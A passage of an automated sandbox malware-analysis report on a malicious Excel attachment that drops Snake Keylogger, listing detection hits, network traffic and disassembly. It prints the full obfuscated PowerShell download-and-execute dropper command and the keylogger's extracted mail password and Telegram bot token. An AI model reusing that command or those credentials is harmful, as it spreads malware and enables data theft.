ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3736, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline", ProcessId: 3844, ProcessName: csc.exe
            Sigma detected: Excel Network Connections
            Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 172.67.216.244, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3344, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3736, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe
            Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
            Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, QueryName: checkip.dyndns.org
            Sigma detected: Suspicious Office Outbound Connections
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3344, Protocol: tcp, SourceIp: 172.67.216.244, SourceIsIpv6: false, SourcePort: 443
            Sigma detected: Dynamic CSharp Compile Artefact
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3736, TargetFilename: C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3344, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))", CommandLine: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR
            Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3736, TargetFilename: C:\Users\user\AppData\Local\Temp\xe1pvlqt.go1.ps1

            Data Obfuscation

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3736, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline", ProcessId: 3844, ProcessName: csc.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-30T10:12:20.043508+020020241971A Network Trojan was detected172.245.123.680192.168.2.2249164TCP
            2024-09-30T10:12:22.720605+020020241971A Network Trojan was detected172.245.123.680192.168.2.2249166TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-30T10:12:20.038629+020020244491Attempted User Privilege Gain192.168.2.2249164172.245.123.680TCP
            2024-09-30T10:12:22.720603+020020244491Attempted User Privilege Gain192.168.2.2249166172.245.123.680TCP
            2024-09-30T10:12:44.169207+020020244491Attempted User Privilege Gain192.168.2.2249172172.245.123.680TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-30T10:12:50.120555+020028033053Unknown Traffic192.168.2.2249175188.114.96.3443TCP
            2024-09-30T10:12:53.392220+020028033053Unknown Traffic192.168.2.2249179188.114.97.3443TCP
            2024-09-30T10:13:01.037486+020028033053Unknown Traffic192.168.2.2249188188.114.96.3443TCP
            2024-09-30T10:13:02.434337+020028033053Unknown Traffic192.168.2.2249190188.114.96.3443TCP
            2024-09-30T10:13:07.171691+020028033053Unknown Traffic192.168.2.2249196188.114.97.3443TCP
            2024-09-30T10:13:09.823366+020028033053Unknown Traffic192.168.2.2249200188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-30T10:12:48.103213+020028032742Potentially Bad Traffic192.168.2.2249173193.122.130.080TCP
            2024-09-30T10:12:49.716717+020028032742Potentially Bad Traffic192.168.2.2249173193.122.130.080TCP
            2024-09-30T10:12:51.550829+020028032742Potentially Bad Traffic192.168.2.2249176132.226.8.16980TCP
            2024-09-30T10:12:52.906975+020028032742Potentially Bad Traffic192.168.2.2249178132.226.247.7380TCP
            2024-09-30T10:13:00.977373+020028032742Potentially Bad Traffic192.168.2.2249187193.122.6.16880TCP
            2024-09-30T10:13:02.049650+020028032742Potentially Bad Traffic192.168.2.2249187193.122.6.16880TCP
            2024-09-30T10:13:03.528766+020028032742Potentially Bad Traffic192.168.2.2249191193.122.130.080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "teilecar@teilecar.com", "Password": "Manta924porsche=911", "Host": "mail.teilecar.com", "Port": "587", "Token": "7999924339:AAGXruqvzq9xMXJCD4qt4gTPOUJ8WiZw7pY", "Chat_id": "6183379562", "Version": "5.1"}
            Multi AV Scanner detection for domain / URL
            Source: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaVirustotal: Detection: 8%Perma Link
            Source: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htahttp://172.245.123.6/xampp/crio/IEnetboVirustotal: Detection: 7%Perma Link
            Source: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta...Virustotal: Detection: 7%Perma Link
            Source: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaC:Virustotal: Detection: 7%Perma Link
            Source: http://172.245.123.6/770/dllhost.exesVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for submitted file
            Source: SYSN ORDER.xlsReversingLabs: Detection: 21%
            Source: SYSN ORDER.xlsVirustotal: Detection: 25%Perma Link
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\dllhost.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: SYSN ORDER.xlsJoe Sandbox ML: detected

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49174 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49189 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49170 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49169 version: TLS 1.2
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.pdbhP source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.pdb source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: .pdb- source: powershell.exe, 00000007.00000002.450490527.000000001C26D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: dllhost.exe, 0000000B.00000003.457458301.0000000003900000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.459419334.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.492203935.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.492301433.0000000002DD0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: .pdb) source: powershell.exe, 00000011.00000002.482289693.000000001AC63000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.pdb source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.pdbhP source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_003C5038
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 003C7B81h14_2_003C78C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 003C5D07h14_2_003C5B18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 003C6691h14_2_003C5B18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 003C8143h14_2_003C7D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 003C6A01h14_2_003C6741
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 003C72C1h14_2_003C7001
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 003C8143h14_2_003C8072
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_003C584B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 003C6E61h14_2_003C6BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 003C7721h14_2_003C7461
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_003C566A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004CC729h14_2_004CC480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C2889h14_2_004C25E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C46F1h14_2_004C4448
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C9711h14_2_004C9468
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C12D1h14_2_004C1028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004CC2D1h14_2_004CC028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C1B81h14_2_004C18D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004CCC15h14_2_004CC8D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C9B91h14_2_004C98E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C4FA1h14_2_004C4CF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C1729h14_2_004C1480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C4B49h14_2_004C48A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C9FE9h14_2_004C9D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C53F9h14_2_004C5150
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C1FD9h14_2_004C1D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004CA899h14_2_004CA5F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C2431h14_2_004C2188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004CA441h14_2_004CA198
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]14_2_004C79AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C5851h14_2_004C55A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004CACF1h14_2_004CAA48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C5CA9h14_2_004C5A00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C2CE1h14_2_004C2A38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C3591h14_2_004C32E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]14_2_004C7698
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C3139h14_2_004C2E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004CB149h14_2_004CAEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C39E9h14_2_004C3740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C0A21h14_2_004C0778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004CBA21h14_2_004CB778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C05C9h14_2_004C0320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004CB5CAh14_2_004CB320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C0E79h14_2_004C0BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004CBE79h14_2_004CBBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C4299h14_2_004C3FF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004C3E41h14_2_004C3B98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h23_2_002D5038
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 002D7B81h23_2_002D78CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 002D5D07h23_2_002D5B18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 002D6691h23_2_002D5B18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 002D8143h23_2_002D7D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 002D6A01h23_2_002D6741
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 002D72C1h23_2_002D7001
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 002D8143h23_2_002D8072
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h23_2_002D584B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 002D6E61h23_2_002D6BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 002D7721h23_2_002D7461
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h23_2_002D566A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044C729h23_2_0044C480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004446F1h23_2_00444448
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00449711h23_2_00449468
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004412D1h23_2_00441028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044C2D1h23_2_0044C028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00441B81h23_2_004418D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044CC15h23_2_0044C8D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00449B91h23_2_004498E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00444FA1h23_2_00444CF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00441729h23_2_00441480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00444B49h23_2_004448A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00449FE9h23_2_00449D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004453F9h23_2_00445150
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00441FD9h23_2_00441D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00442889h23_2_004425E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044A899h23_2_0044A5F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00442431h23_2_00442188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044A441h23_2_0044A198
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]23_2_004479AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00445851h23_2_004455A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044ACF1h23_2_0044AA48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00445CA9h23_2_00445A00
